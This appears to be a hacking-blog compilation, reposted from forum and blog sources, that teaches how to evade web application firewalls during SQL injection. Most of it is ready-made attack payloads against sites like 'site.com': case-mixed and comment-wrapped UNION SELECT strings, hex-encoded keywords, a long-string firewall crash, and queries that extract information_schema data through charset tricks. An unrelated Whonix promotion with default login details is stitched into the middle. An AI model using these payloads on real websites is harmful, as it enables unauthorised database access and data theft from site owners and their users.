[TUT] WAF Bypass Sql Injection

Today I am going to show you how to bypass Web Application Firewalls ( WAF ). I will demonstrate from the Simpliest and most Basic Techniques to the Most Advanced ones!

NOTE: If you don’t know SQL Injection, read this first…

What is WAF?

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections!

Let’s Begin!

How to know if there is a Web Application Firewall?

This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).

Example:

http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….

(We get a 403 Error!)

Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF…

1) Comments:

You can use comments to bypass WAF:

http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….

(First Method that can Bypass WAF)

However, most WAF identify this method so they still show a “Forbidden” Error…

2) Change the Case of the Letters:

You can also change the Case of the Command:

http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….

(Another Basic Method to Bypass WAF!)

However, as before, this trick is also detected by most WAF!

3) Combine the previous Methods:

What you can also do is to combine the previous two methods:

http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….

This method is not detectable by many Web Application Firewalls!

4) Replaced Keywords:

Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:

http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….

(The “union” and the “select” will be removed, so the final result will be: “UNION SELECT” )

This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!

5) Inline Comments:

Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:

http://www.site.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…

(The %55 is equal to “U” and %53 to “S”. See more on the Advanced Section….)

I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…

Advanced Methods:

Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:

Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!

http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….

(( You can test if the WAF can be crashed by typing:

?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….

If you get a 500, you can exploit it using the Buffer Overflow Method! ))

2) Replace Characters with their HEX Values:

We can replace some characters with their HEX (URL-Encoded) Values.

Example:

http://www.site.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….

(which means “union select”)

Text to Hex Encoder (Choose the “Hex Encoded for URL” result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:

Apart from the “UNION SELECT” other commands might be blocked.

Common Commands Blocked:

COMMAND | WHAT TO USE INSTEAD

@@version | version()

concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU

group_concat() | concat_ws()

Learning MySQL Really helps on such issues!

4) Misc Exploitable Functions:

Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):

Example:

This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:

http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4&#8230 ;

(If the Firewall removes the “*”, the result will be: 15+union+select….)

So, if you find such a silly function, you can exploit it, in this way!

[+] In addition to the previous example, some other bypasses might be:

-15+(uNioN)+(sElECt)….

-15+(uNioN+SeleCT)+…

-15+(UnI)(oN)+(SeL)(ecT)+….

-15+union (select 1,2,3,4…)

Video Tutorial on WAF Bypassing:

 (This tutorial was originally created by Akatzbreaker for Hackforums.net.   The original Post is here… )

Whonix OS - A complete anonymous TOR OS

About whonix OS :

Whonix is a general purpose operating system working on virtual box, Debian GNU/Linux and Tor.Whonix is designed in a way that IP and DNS leaks are not possible, even a malware with administrative rights can not find out User's real IP adress and Location.




 (Image: GUI Desktop whonix OS)

 This works by running two virtual machines,one runs TOR and acts a gateway protector and other isolated whonix workstation for complete isolation.





Whonix is designed by team of TOR anonymity team,as it's under a beta version some bugs and virtuality issues may be found..


Screenshots of WHONIX OS:



(Image: TOR browser configured for anonymous browsing)



(Image:Flash leak test conducted for complete anonymity verification)





Some of the best features of whonix os are it can run flash ,java applets anonymously also it hide's the tracer from finding that you are using TOR.You can download this anonymous TOR powered whonix os from here..


 WHONIX OS <<DOWNLOAD LINK>>


If you are a first time user then the default username and passwords are,| USERNAME: user PASSWORD:changeme |

source :  http://hackersmeet.blogspot.in

WAF Bypass Sql Injection Tips

This is for who knows sql injection. Sometimes there will be a 403 forbidden error or not acceptable error its because of the WAF (web application firewall) you can bypass this by using the following queries. If u dont know sql injection you can learn it HERE

Order By Not Working?

You can simply bypass it by using group by instead of order by

Union Select Bypassing::

union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0)) 

/*!50000union*/+/*!50000select*/ 

UNIunionON+SELselectECT 

+union+distinct+select+ 

+union+distinctROW+select+ 

union+/*!select*/+1,2,3 

union/**/select/**/1,2,3 

uni%20union%20/*!select*/%20 

/**//*!union*//**//*!select*//**/ 

union%23aa%0Aselect 

/**/union/*!50000select*/ 

/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/ 

%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/ 

+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+ 

id=1+’UnI”On’+'SeL”ECT’ <-MySQL only 

id=1+'UnI'||'on'+SeLeCT' <-MSSQL only

after id no. like id=1 +/*!and*/+1=0

+div+0 

Having+1=0 

+AND+1=0 

+/*!and*/+1=0 

and(1)=(0)

False The Url::

=-id=-1 union all select 

id=null union all select 

id=1+and+false+union+all+select 

id=9999 union all select

Order Bypassing do like this

/*!table_name*/ 

+from /*!information_schema*/./*!tables*/ where table_schema=database() 

unhex(hex(Concat(Column_Name,0x3e ,Table_schema,0x3e,table_Name))) 

/*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%2011 5,%2037)

used with order::

convert()using ascii) 

unhex(hex())

If ascii dont work you could try:

ujis 

ucs2 

tis620 

swe7 

sjis 

macroman 

macce 

latin7 

latin5 

latin2 

koi8u 

koi8r 

keybcs2 

hp8 

geostd8 

gbk 

gb2132 

armscii8 

ascii 

binary 

cp1250 

big5 

cp1251 

cp1256 

cp1257 

cp850 

cp852 

cp866 

cp932 

dec8 

euckr 

latin1 

utf8

source :  http://hack2play.blogspot.com